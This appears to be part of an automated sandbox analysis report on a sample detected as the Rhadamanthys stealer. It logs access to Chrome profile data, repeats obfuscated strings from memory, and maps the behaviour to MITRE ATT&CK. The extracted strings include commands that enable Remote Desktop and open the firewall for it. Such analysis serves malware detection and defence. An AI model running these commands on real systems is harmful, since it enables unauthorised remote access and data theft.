Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnWebGPUCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnGraphiteCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\discounts_db
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
Source: C:\Windows\System32\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb

Source: C:\Windows\System32\svchost.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Windows\System32\svchost.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\svchost.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Windows\System32\svchost.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Windows\System32\svchost.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Windows\System32\svchost.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH

Source: C:\Windows\System32\svchost.exe

Directory queried: number of queries: 1013

Remote Access Functionality

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000014.00000003.1697994530.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1612057695.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1621277287.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1460759319.0000000003040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1452899533.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1525068541.00000000030E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1760142384.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1460774355.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1682405399.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1693948772.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1697999460.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1621486479.0000000002940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to start a terminal service

Source: update.exe, 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: update.exe, 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set6fb2945b73f4685e264b82b04b1fd8c69e10aae64ffb8138362fd4ae6e92862f80eb71fe6d5871c1a6ac1593920759114a7efcIIVlMMGvIbFnHgC4G8CFXziAIx4sHQyz2RYlWOhj6H8BIX5qKt==PD1c AOuEX2jbJ==GXWjbJ==HEFRKzyAUrJWTt==M8iRbQPuHe0XUN==P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62NoLzWZ7eUV==P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62KY8BeDatU2K4TQHm9aGM6DPw3xuH9Ty SYzEP8S9agL29s==PrWkT72bGv3EExOGMBfWzx2AIUF6P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62NoLz8sWlXzrtIrN PMKmXWDi8PR=P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62KY8BeDatU2K4SVbm8yB Mj3wQBOz n==E0WKPODRQcdzNRrJAL==SJGnat==PJ KTt==M5WL61RX9sNX87RX78NXTrlXT2JX8LNX915XUL1XT2ZX7MZX77dX8o1=T8KcXvZl8yC1TZrt4xYl9xyXT8KcXvZl8yB=T7ygavZl8yB=UIF=UYF=UYJ=UYN=O1Gg ==6MSRawiwHo==6MSRaAG7Hqc=U2icULyjT72b8MNo72Og rmnG8GS9PP1KLN+KLR+G6CjbP8q8fRoFDtiDB==aF==EsWl9QK KV==87ic zqAIa d7Dq=67Wp fPtIrNnUDrwM7WRRfz17P4eP0fD5BOuPN6b5x==PMKmXWDi8MWa9DzgL00sSUKhQUdf9E8l4hN=L20gafy=N7GqazPz9UyYDBrlPb==M0OwTt==PLGlXzyhQU0c9UDt5Cd=ML abz3zExieTd==L00yHEZnTz31UOCMUTH54he1bH==LrmRXzPnVO dUUC=Or pbz3vP7 n9z3AL7 k VLwQ7mlPzPnVO dUUC=HIFpKsK2JbhXJN==8rJ=97J=L7 lbzPv u6N UvpFduuaNyP4YrmfkSqUr p LVlUPWaJvvm3YOvWxGn8UQyOP2oGX1kJLUuyVqu VZ1VO TGRLt4Yuw TmP4XZzRfDh78KkJPLi yJ0DDZl3RN FdS77HunRvDh61yc fzuVL5bDl1BOV3v y0n9zVY6SumL C76IrxdTPc9Lmm b3wUVWe9zVD5CCmVN1CvhQPyVpkJLUuHK5=GX1EA ==K8OaacUyGrqnXp==L7 lbzPv u6N UvpFdui yCh4XDmgDnq7n VJQ84 q6f70DxCSOz9xWjR3Zp2TS=P6mKTxPOTwSU8kDp3iKE9T6P6nZxXZXVSJOm gLz8UC6LZ3x4CO1WOKDRXRq0BPq72CSbzPzPeKmUN==L7 kaAP1VPOHTTVpT1KaXzPnVUmi6jnw3RYw yGn64H6gkfZ 2pnKMCAJvZVIwa9CQ1=G2Wl9PHwVyZmP6mKTxPOTwSU8kDp3iKE9T6P6nZxXZXVSJOm gLz8UC6QTZt5BOlSdm SXZhTXaJQKKGRyrXOMWyOYq=P6mKTxPOTwSo7kLC3XqUWORlFEvhXZXt9rmaXQHdMeKs6THI2SGx9xGUQGPu2DXqQrmbXP3KNs==SIBnKwu=MLWdWQPt xSe9ELt3h7AIciHSYDAeEXV61 lMLWdWQPt xSe9ELt3h7AIcmHSYDAeEXV61 lP5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98N8ReLdMV0r8jPy5ASm eOe53U=PMKmXAPk w a7TO=HoBoMJ==HoBpK ==HoBoL ==HoBpLJ==L8WpafPv wOU6TroSF==JopX8sWlXzrtIrNnUUbpG7t8DsS9aVns7OClDz3qzx2q9JB8DnBdHbv17O6e70P4zyxhG Z6SHLxLx==EnZ8PQbq uN=DnBdHbvzVO9 DHZdGt==PL UXQDA7y0l7zZp6BN=G1WVXPH2 yqo7kvz3BekbJCnSXRAgDXu61elXPKhHM4i7DOkzb==Dl==87iSbzLw U9 GUGkCSJhJr==88R0ap==8rGlXz3uN7WWWf3i9eV ODz93YO1UwCnSXnA1TS=HIBnKwu1ILp=HIBnKwu1IbN=HIBnKwu1IbR=HIBnKwu1IU3=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: update.exe, 00000001.00000002.1335304555.00000000008B1000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: net start termservice
Source: update.exe, 00000001.00000002.1335304555.00000000008B1000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set6fb2945b73f4685e264b82b04b1fd8c69e10aae64ffb8138362fd4ae6e92862f80eb71fe6d5871c1a6ac1593920759114a7efcIIVlMMGvIbFnHgC4G8CFXziAIx4sHQyz2RYlWOhj6H8BIX5qKt==PD1c AOuEX2jbJ==GXWjbJ==HEFRKzyAUrJWTt==M8iRbQPuHe0XUN==P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62NoLzWZ7eUV==P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62KY8BeDatU2K4TQHm9aGM6DPw3xuH9Ty SYzEP8S9agL29s==PrWkT72bGv3EExOGMBfWzx2AIUF6P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62NoLz8sWlXzrtIrN PMKmXWDi8PR=P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62KY8BeDatU2K4SVbm8yB Mj3wQBOz n==E0WKPODRQcdzNRrJAL==SJGnat==PJ KTt==M5WL61RX9sNX87RX78NXTrlXT2JX8LNX915XUL1XT2ZX7MZX77dX8o1=T8KcXvZl8yC1TZrt4xYl9xyXT8KcXvZl8yB=T7ygavZl8yB=UIF=UYF=UYJ=UYN=O1Gg ==6MSRawiwHo==6MSRaAG7Hqc=U2icULyjT72b8MNo72Og rmnG8GS9PP1KLN+KLR+G6CjbP8q8fRoFDtiDB==aF==EsWl9QK KV==87ic zqAIa d7Dq=67Wp fPtIrNnUDrwM7WRRfz17P4eP0fD5BOuPN6b5x==PMKmXWDi8MWa9DzgL00sSUKhQUdf9E8l4hN=L20gafy=N7GqazPz9UyYDBrlPb==M0OwTt==PLGlXzyhQU0c9UDt5Cd=ML abz3zExieTd==L00yHEZnTz31UOCMUTH54he1bH==LrmRXzPnVO dUUC=Or pbz3vP7 n9z3AL7 k VLwQ7mlPzPnVO dUUC=HIFpKsK2JbhXJN==8rJ=97J=L7 lbzPv u6N UvpFduuaNyP4YrmfkSqUr p LVlUPWaJvvm3YOvWxGn8UQyOP2oGX1kJLUuyVqu VZ1VO TGRLt4Yuw TmP4XZzRfDh78KkJPLi yJ0DDZl3RN FdS77HunRvDh61yc fzuVL5bDl1BOV3v y0n9zVY6SumL C76IrxdTPc9Lmm b3wUVWe9zVD5CCmVN1CvhQPyVpkJLUuHK5=GX1EA ==K8OaacUyGrqnXp==L7 lbzPv u6N UvpFdui yCh4XDmgDnq7n VJQ84 q6f70DxCSOz9xWjR3Zp2TS=P6mKTxPOTwSU8kDp3iKE9T6P6nZxXZXVSJOm gLz8UC6LZ3x4CO1WOKDRXRq0BPq72CSbzPzPeKmUN==L7 kaAP1VPOHTTVpT1KaXzPnVUmi6jnw3RYw yGn64H6gkfZ 2pnKMCAJvZVIwa9CQ1=G2Wl9PHwVyZmP6mKTxPOTwSU8kDp3iKE9T6P6nZxXZXVSJOm gLz8UC6QTZt5BOlSdm SXZhTXaJQKKGRyrXOMWyOYq=P6mKTxPOTwSo7kLC3XqUWORlFEvhXZXt9rmaXQHdMeKs6THI2SGx9xGUQGPu2DXqQrmbXP3KNs==SIBnKwu=MLWdWQPt xSe9ELt3h7AIciHSYDAeEXV61 lMLWdWQPt xSe9ELt3h7AIcmHSYDAeEXV61 lP5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98N8ReLdMV0r8jPy5ASm eOe53U=PMKmXAPk w a7TO=HoBoMJ==HoBpK ==HoBoL ==HoBpLJ==L8WpafPv wOU6TroSF==JopX8sWlXzrtIrNnUUbpG7t8DsS9aVns7OClDz3qzx2q9JB8DnBdHbv17O6e70P4zyxhG Z6SHLxLx==EnZ8PQbq uN=DnBdHbvzVO9 DHZdGt==PL UXQDA7y0l7zZp6BN=G1WVXPH2 yqo7kvz3BekbJCnSXRAgDXu61elXPKhHM4i7DOkzb==Dl==87iSbzLw U9 GUGkCSJhJr==88R0ap==8rGlXz3uN7WWWf3i9eV ODz93YO1UwCnSXnA1TS=HIBnKwu1ILp=HIBnKwu1IbN=HIBnKwu1IbR=HIBnKwu1IU3=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Gxtuum.exe, 00000002.00000002.1338096886.00000000008A1000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000002.00000002.1338096886.00000000008A1000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set6fb2945b73f4685e264b82b04b1fd8c69e10aae64ffb8138362fd4ae6e92862f80eb71fe6d5871c1a6ac1593920759114a7efcIIVlMMGvIbFnHgC4G8CFXziAIx4sHQyz2RYlWOhj6H8BIX5qKt==PD1c AOuEX2jbJ==GXWjbJ==HEFRKzyAUrJWTt==M8iRbQPuHe0XUN==P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62NoLzWZ7eUV==P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62KY8BeDatU2K4TQHm9aGM6DPw3xuH9Ty SYzEP8S9agL29s==PrWkT72bGv3EExOGMBfWzx2AIUF6P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62NoLz8sWlXzrtIrN PMKmXWDi8PR=P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62KY8BeDatU2K4SVbm8yB Mj3wQBOz n==E0WKPODRQcdzNRrJAL==SJGnat==PJ KTt==M5WL61RX9sNX87RX78NXTrlXT2JX8LNX915XUL1XT2ZX7MZX77dX8o1=T8KcXvZl8yC1TZrt4xYl9xyXT8KcXvZl8yB=T7ygavZl8yB=UIF=UYF=UYJ=UYN=O1Gg ==6MSRawiwHo==6MSRaAG7Hqc=U2icULyjT72b8MNo72Og rmnG8GS9PP1KLN+KLR+G6CjbP8q8fRoFDtiDB==aF==EsWl9QK KV==87ic zqAIa d7Dq=67Wp fPtIrNnUDrwM7WRRfz17P4eP0fD5BOuPN6b5x==PMKmXWDi8MWa9DzgL00sSUKhQUdf9E8l4hN=L20gafy=N7GqazPz9UyYDBrlPb==M0OwTt==PLGlXzyhQU0c9UDt5Cd=ML abz3zExieTd==L00yHEZnTz31UOCMUTH54he1bH==LrmRXzPnVO dUUC=Or pbz3vP7 n9z3AL7 k VLwQ7mlPzPnVO dUUC=HIFpKsK2JbhXJN==8rJ=97J=L7 lbzPv u6N UvpFduuaNyP4YrmfkSqUr p LVlUPWaJvvm3YOvWxGn8UQyOP2oGX1kJLUuyVqu VZ1VO TGRLt4Yuw TmP4XZzRfDh78KkJPLi yJ0DDZl3RN FdS77HunRvDh61yc fzuVL5bDl1BOV3v y0n9zVY6SumL C76IrxdTPc9Lmm b3wUVWe9zVD5CCmVN1CvhQPyVpkJLUuHK5=GX1EA ==K8OaacUyGrqnXp==L7 lbzPv u6N UvpFdui yCh4XDmgDnq7n VJQ84 q6f70DxCSOz9xWjR3Zp2TS=P6mKTxPOTwSU8kDp3iKE9T6P6nZxXZXVSJOm gLz8UC6LZ3x4CO1WOKDRXRq0BPq72CSbzPzPeKmUN==L7 kaAP1VPOHTTVpT1KaXzPnVUmi6jnw3RYw yGn64H6gkfZ 2pnKMCAJvZVIwa9CQ1=G2Wl9PHwVyZmP6mKTxPOTwSU8kDp3iKE9T6P6nZxXZXVSJOm gLz8UC6QTZt5BOlSdm SXZhTXaJQKKGRyrXOMWyOYq=P6mKTxPOTwSo7kLC3XqUWORlFEvhXZXt9rmaXQHdMeKs6THI2SGx9xGUQGPu2DXqQrmbXP3KNs==SIBnKwu=MLWdWQPt xSe9ELt3h7AIciHSYDAeEXV61 lMLWdWQPt xSe9ELt3h7AIcmHSYDAeEXV61 lP5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98N8ReLdMV0r8jPy5ASm eOe53U=PMKmXAPk w a7TO=HoBoMJ==HoBpK ==HoBoL ==HoBpLJ==L8WpafPv wOU6TroSF==JopX8sWlXzrtIrNnUUbpG7t8DsS9aVns7OClDz3qzx2q9JB8DnBdHbv17O6e70P4zyxhG Z6SHLxLx==EnZ8PQbq uN=DnBdHbvzVO9 DHZdGt==PL UXQDA7y0l7zZp6BN=G1WVXPH2 yqo7kvz3BekbJCnSXRAgDXu61elXPKhHM4i7DOkzb==Dl==87iSbzLw U9 GUGkCSJhJr==88R0ap==8rGlXz3uN7WWWf3i9eV ODz93YO1UwCnSXnA1TS=HIBnKwu1ILp=HIBnKwu1IbN=HIBnKwu1IbR=HIBnKwu1IU3=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Gxtuum.exe, 00000002.00000002.1337387852.0000000000770000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000002.00000002.1337387852.0000000000770000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set6fb2945b73f4685e264b82b04b1fd8c69e10aae64ffb8138362fd4ae6e92862f80eb71fe6d5871c1a6ac1593920759114a7efcIIVlMMGvIbFnHgC4G8CFXziAIx4sHQyz2RYlWOhj6H8BIX5qKt==PD1c AOuEX2jbJ==GXWjbJ==HEFRKzyAUrJWTt==M8iRbQPuHe0XUN==P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62NoLzWZ7eUV==P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62KY8BeDatU2K4TQHm9aGM6DPw3xuH9Ty SYzEP8S9agL29s==PrWkT72bGv3EExOGMBfWzx2AIUF6P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62NoLz8sWlXzrtIrN PMKmXWDi8PR=P5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98O4OWPz9e0n9CTp4iGq9T62KY8BeDatU2K4SVbm8yB Mj3wQBOz n==E0WKPODRQcdzNRrJAL==SJGnat==PJ KTt==M5WL61RX9sNX87RX78NXTrlXT2JX8LNX915XUL1XT2ZX7MZX77dX8o1=T8KcXvZl8yC1TZrt4xYl9xyXT8KcXvZl8yB=T7ygavZl8yB=UIF=UYF=UYJ=UYN=O1Gg ==6MSRawiwHo==6MSRaAG7Hqc=U2icULyjT72b8MNo72Og rmnG8GS9PP1KLN+KLR+G6CjbP8q8fRoFDtiDB==aF==EsWl9QK KV==87ic zqAIa d7Dq=67Wp fPtIrNnUDrwM7WRRfz17P4eP0fD5BOuPN6b5x==PMKmXWDi8MWa9DzgL00sSUKhQUdf9E8l4hN=L20gafy=N7GqazPz9UyYDBrlPb==M0OwTt==PLGlXzyhQU0c9UDt5Cd=ML abz3zExieTd==L00yHEZnTz31UOCMUTH54he1bH==LrmRXzPnVO dUUC=Or pbz3vP7 n9z3AL7 k VLwQ7mlPzPnVO dUUC=HIFpKsK2JbhXJN==8rJ=97J=L7 lbzPv u6N UvpFduuaNyP4YrmfkSqUr p LVlUPWaJvvm3YOvWxGn8UQyOP2oGX1kJLUuyVqu VZ1VO TGRLt4Yuw TmP4XZzRfDh78KkJPLi yJ0DDZl3RN FdS77HunRvDh61yc fzuVL5bDl1BOV3v y0n9zVY6SumL C76IrxdTPc9Lmm b3wUVWe9zVD5CCmVN1CvhQPyVpkJLUuHK5=GX1EA ==K8OaacUyGrqnXp==L7 lbzPv u6N UvpFdui yCh4XDmgDnq7n VJQ84 q6f70DxCSOz9xWjR3Zp2TS=P6mKTxPOTwSU8kDp3iKE9T6P6nZxXZXVSJOm gLz8UC6LZ3x4CO1WOKDRXRq0BPq72CSbzPzPeKmUN==L7 kaAP1VPOHTTVpT1KaXzPnVUmi6jnw3RYw yGn64H6gkfZ 2pnKMCAJvZVIwa9CQ1=G2Wl9PHwVyZmP6mKTxPOTwSU8kDp3iKE9T6P6nZxXZXVSJOm gLz8UC6QTZt5BOlSdm SXZhTXaJQKKGRyrXOMWyOYq=P6mKTxPOTwSo7kLC3XqUWORlFEvhXZXt9rmaXQHdMeKs6THI2SGx9xGUQGPu2DXqQrmbXP3KNs==SIBnKwu=MLWdWQPt xSe9ELt3h7AIciHSYDAeEXV61 lMLWdWQPt xSe9ELt3h7AIcmHSYDAeEXV61 lP5 xTy8CQc06OTfn4h2A9T0PQG4uejTq98N8ReLdMV0r8jPy5ASm eOe53U=PMKmXAPk w a7TO=HoBoMJ==HoBpK ==HoBoL ==HoBpLJ==L8WpafPv wOU6TroSF==JopX8sWlXzrtIrNnUUbpG7t8DsS9aVns7OClDz3qzx2q9JB8DnBdHbv17O6e70P4zyxhG Z6SHLxLx==EnZ8PQbq uN=DnBdHbvzVO9 DHZdGt==PL UXQDA7y0l7zZp6BN=G1WVXPH2 yqo7kvz3BekbJCnSXRAgDXu61elXPKhHM4i7DOkzb==Dl==87iSbzLw U9 GUGkCSJhJr==88R0ap==8rGlXz3uN7WWWf3i9eV ODz93YO1UwCnSXnA1TS=HIBnKwu1ILp=HIBnKwu1IbN=HIBnKwu1IbR=HIBnKwu1IU3=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0BFC60 bind,listen,WSAGetLastError,closesocket,	1_2_6D0BFC60
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C82FC60 bind,listen,WSAGetLastError,closesocket,	2_2_6C82FC60
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4DDA70 bind,listen,WSAGetLastError,closesocket,	5_2_6C4DDA70

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	21 Native API	2 Scheduled Task/Job	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	11 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
